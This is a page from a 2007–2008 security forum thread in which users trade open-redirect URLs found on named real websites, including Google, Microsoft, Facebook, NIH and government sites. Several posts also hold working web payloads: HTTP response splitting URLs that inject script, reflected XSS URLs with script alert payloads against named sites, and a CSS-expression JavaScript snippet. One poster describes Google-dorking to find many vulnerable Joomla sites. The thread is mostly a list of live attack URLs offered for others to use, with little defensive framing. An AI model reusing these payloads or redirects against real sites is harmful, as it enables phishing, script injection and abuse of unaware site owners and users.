Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011Next
Current Page: 10 of 11
Re: So it begins - Redirects Edition
Date: April 24, 2007 11:17AM

http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_u=http%3a%2f%2fwww.disney.com%2f

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: April 25, 2007 06:31PM

http://dw.com.com/redir?ltype=&siteid=45&edid=107&useract=51&destURL=http://www.google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: April 26, 2007 08:07AM

http://www.hugeurl.com/?YTUzM2ViZGVkMWQ1YWFlYjdhNzkzM2RlNzBkZmM2ZTgmMTMmVm0wd2QyUXlVWGxWV0d4WFlUSm9WMVl3Wkc5V1ZsbDNXa2M1YWxKc1dqQlVWbHBQVjBaYWMySkVUbGhoTVVwVVZtcEdZV015U2tWVWJHaG9UV3N3ZUZacVFtRlRNazE1VTJ0V1ZXSkhhRzlVVm1oRFZWWmFkR1ZHV214U2JHdzFWa2QwYzJGc1NuUmhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpVVmtwV2JURXdZVEZrU0ZOclpHcFRSVXBZVkZWYWQxTkdVbFZTYlVacVZtdGFNRlZ0ZUZOVWJVWTJVbFJHVjFaRmIzZFdha1poVjBaT2NtSkdTbWxTTW1oWlYxZDRiMkl3TUhoWGJHUllZbFZhY2xWc1VrZFhiR3QzV2tSU1ZrMXJjRWxhU0hCSFZqSkZlVlZZWkZwV1JWcHlWVEJhVDJOc2NFaGpSbEpUVmxoQ1dsWnJXbGRoTVZWNVZXNU9hbEp0VWxsWmJGWmhZMVpzY2xkdFJteFdiVko1VmpJMWExWXdNVVZTYTFwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKT2RGTnJaRlJpVjNoWVZXcE9iMWRHV25STlNHUnNVakJzTkZVeWRHdGhWazVHVjJ4U1dtSkhhRlJXTVZwWFkxWktjbVJHVWxkaVJtOTNWMnhXYjJFeFdYZE5WVlpUWVRGd1dGbHJaRzlqYkZweFUydGFiRlpzV2xwWGExcHJZVWRGZUdOR2JGaGhNVnBvVmtSS1QyUkdTbkpoUjJoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxKRlduSlVWbFp6VGxaYVdFNVZPV2hXYXpWSFZqSjRVMWR0U2toaFJsSlhUVVp3VkZacVJuZFNNVkowWlVkc1UySllZM2hXYTFwaFZURlZlRmR1U2s1V1ZscFVXV3RrVTFsV1VsWlhiVVpzWWtad2VGVXlkREJXTVZweVYyeHdXbFpXY0hKWlZXUkdaV3hHY21KR2FGaFRSVXBKVm10U1MxVXhXWGhYYmxaV1lsZG9WRmxyVm5kV1ZscDBaVWM1VWsxWFVsaFdNV2h2V1ZaS1JsTnRSbGRpV0U0MFZHdGFWbVZYVWtoa1JtUnBWbGhDTlZkVVFtRmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVkp1WkZOV2ExcDVWREZrYzFVd01IbGhSbXhYWWxoQ1RGUnJXbEpsVmtweVdrWm9hV0Y2Vm5oV1ZFSnZVVEZzVjFWc1dsaGliVkp5V1d0YWQyVkdWblJrUkVKb1lYcEdlVlJzVm05WGJGcFhZMFJPV2xaWFVrZGFWM2hIWTJzeFYxcEdaRTVOUlhCS1ZtMTBVMU14VW5SV2EyUmhVMFphVmxsc1ZtRldSbEpZVGxjNVdGWnNjRmxaTUZVMVlWVXhXRlZyYUZkTmFsWlVWa2Q0VDFOR1ZuVlViRnBwVjBkb1dWWkdVa2RWTWsxNVVtdGFVRlp0VW5CV2JHaERUbFphU0dWSFJsWk5WbXcxVld4b2MxWnNXa1pUYkdoWFlXczFkbGxWV21GalZrcHpXa1pvVjJKclNrbFdWbVEwV1ZaWmVGTnJXbE5XUlZVNQ==

lol

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: April 30, 2007 09:06PM

http://www.google.com/searchhistory/url?url=http://sla.ckers.org

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 04/30/2007 09:06PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: May 02, 2007 11:25AM

http://free.grisoft.com/linkout.php?doc=5130&to=http://www.google.com Redirect
http://free.grisoft.com/linkout.php?doc=5130&to=http%3A%2F%2Fwww.google.com%0ALocation:javascript:%0A%0A%3Cscript%3Ealert(0)%3C/script%3E HTTP Response Splitting

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Anonymous User
Date: May 02, 2007 06:17PM

Anyone knows if/where this Joomla! HTTP Response Splitting/Redirection is disclosed:

http://www.eurid.eu/index2.php?option=com_content&user_rating=1&submit_vote=%E8%A9%95%E4%BE%A1&task=vote&pop=0&Itemid=10&cid=1&url=%0AContent-Type:%20text/html%0AContent-Length:16%0A%0Ayou%20are%20so%20owned

(credited: bill)

Dorked Google (inurl:index2.php?option) and found many vulnerable sites. After a while Google popped-up a nice warning saying that "my query looks like automated request from a computer virus..." so I suppose this is old stuff.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: May 04, 2007 02:03PM

@/nul: I haven't heard it before, it's still a valid issue on 1.0.10 (ouch, I was vulnerable), dunno about 1.0.12, yet. Of course eurid.eu is running a pretty outdated joomla install, seeing as how this works: http://www.eurid.eu/content/category/3/19/55%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3Cp%20id=%22/lang,en/

I'm betting there's some RFI on that site as well.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: FR3DC3RV
Date: May 08, 2007 02:34PM

http://www.imagelink.com.br/redir.asp?url=http://fr3dc3rv.blogspot.com
http://www.v-w-d.com/redir.asp?m=&target=http://fr3dc3rv.blogspot.com
http://www.alexandria.lib.va.us/link/redir.pxe?fr3dc3rv.blogspot.com
http://clicks.emarketmakers.com/ExpiredOffer.aspx?redirectUrl=http://fr3dc3rv.blogspot.com
http://mineco.fgov.be/redir.asp?loc=http://fr3dc3rv.blogspot.com
http://www.nhlbi.nih.gov/cgi-bin/redir.pl?url=http://fr3dc3rv.blogspot.com

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 05/09/2007 08:50AM by FR3DC3RV.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Anonymous User
Date: May 08, 2007 04:43PM

born for porn

http://empornium.us/redir.php?url=http://www.google.com



Edited 2 time(s). Last edit at 05/08/2007 04:47PM by .mario.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: May 10, 2007 12:53AM

http://www.microsoft.com/windows2000/SelectBox-redir.aspx?s=http://www.google.com/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: May 11, 2007 01:16AM

http://adlog.com.com/adlog/x/t=0/http://www.google.com where 'x' is any character

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 05/11/2007 01:17AM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: August 13, 2007 09:50PM

posted in FD, but I thought it was interesting: http://www.google.com/url?q=http://whmt.blogspot.com/&sa=D&sntz=1&usg=1%27 (redirects to the original blog post)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/13/2007 09:51PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: apnovi
Date: August 14, 2007 09:10AM

http://www.analogx.com/cgi-bin/cgirdir.exe?http://google.com/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: August 14, 2007 09:52PM

http://www.facebook.com/search_redirect.php?u=http%3A%2F%2Fgoogle.com user must be logged in

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: apnovi
Date: August 15, 2007 03:30AM

http://www.ahsay.com/awstats/awredir.pl?url=http://google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: nav
Date: August 15, 2007 05:46PM

I contacted RBC about this 2 weeks ago. Not a redirect, but opens in a new frame. Could be used as a phish


[www2.rbccm.com]

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: apnovi
Date: August 19, 2007 11:25AM

porn site redirects

http://www.pichunter.com/o.php?h=http://google.com
http://www.madthumbs.com/cgi-bin/atx/out.cgi?id=39&trade=http://google.com
http://www.freegonzo.com/out.php?urls=http://google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: August 21, 2007 04:39PM

http://washington.gov/exit.aspx?url=www.google.nl

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: August 28, 2007 08:54PM

http://www.lexisnexis.com/search/Results1.asp?redirect&s=1&target=http%3A%2F%2Fwww.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Cynic
Date: September 20, 2007 11:54PM

http://news.google.com/news/url?sa=t&ct=au/19-0&fp=46f30982c5d4752c&ei=ID7zRu-0HIzQqgOUsNDpAw&url=http%3A//sla.ckers.org&sig2=xnaVXpfaSO3NQ7bX5bpqWg


:)

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: krazl
Date: September 24, 2007 11:38PM

http://www.rpi2u.com/message.asp?message=somewhereHere..



Edited 1 time(s). Last edit at 09/24/2007 11:39PM by krazl.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Anonymous User
Date: September 25, 2007 02:08AM

lol

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: September 25, 2007 04:51AM

krazl Wrote:
-------------------------------------------------------
> http://www.rpi2u.com/message.asp?message=somewhere
> Here..

That is not a redirect. It is a XSS hole http://www.rpi2u.com/message.asp?message=<script>alert(1)</script> though, which you could post in the other "So it begins..." forum.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Spyware
Date: September 26, 2007 03:03PM

http://images.google.nl/local_url?q=http://sla.ckers.org
http://maps.google.nl/local_url?q=http://sla.ckers.org

Might work on more sub-domains.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: thornmaker
Date: September 26, 2007 10:24PM

both work on other tld's too like .com, .fi, etc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: krazl
Date: December 13, 2007 10:06PM

friendster..
<div id="mylousycode" expr="window.location('http://www.google.com')" style="background:url('javascript:eval(document.all.mylousycode.expr)')"></div>



Edited 1 time(s). Last edit at 12/13/2007 11:39PM by krazl.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: thrill
Date: December 17, 2007 01:40PM

Better Business Bureau

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Reiners
Date: December 17, 2007 05:33PM

http://www.becks.de/iframes/becksit.php?url=http://sla.ckers.org
http://www.becksbeer.com/lda.aspx?ReturnUrl=http://sla.ckers.org
...

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: January 01, 2008 11:27AM

http://dev.mysql.com/get/anyQueryString/from/http://asdf.com/

anyQueryString is modifiable, as is asdf.com/

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 11, 2008 04:08PM

http://www.globalsecurity.org/cgi-bin/texis.cgi/webinator/search/redir.html?u=http%3A//sla.ckers.org

EDIT: This appears to affect all versions of Thunderstone's Webinator software: http://search.thunderstone.com/texis/redir/main.bin?q=&u=http://www.google.com

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/11/2008 04:20PM by tx.

Options: ReplyQuote
Pages: Previous1234567891011Next
Current Page: 10 of 11


Sorry, only registered users may post in this forum.